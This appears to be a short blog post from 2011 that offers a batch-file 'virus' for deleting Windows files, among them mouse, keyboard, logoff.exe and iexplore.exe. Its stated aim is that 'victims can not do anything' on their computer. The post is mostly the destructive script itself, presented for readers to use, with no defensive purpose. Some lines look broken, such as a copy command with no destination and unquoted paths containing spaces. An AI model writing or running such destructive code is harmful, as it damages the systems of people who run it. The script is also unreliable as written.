Friday, August 26, 2011

Virus to Delete mouse,explore,logoff using Batch Programming

Usually we write simple viruses in batch programming.  This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer.

@echo off

 @if exist c:\windows\system32\mouse del c:\windows\system32\mouse
 @if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
 copy C:\windows\
 @if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
 @if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe

 I hope that you know how to create batch programming. If you don't know please read previous posts about Batch Programming.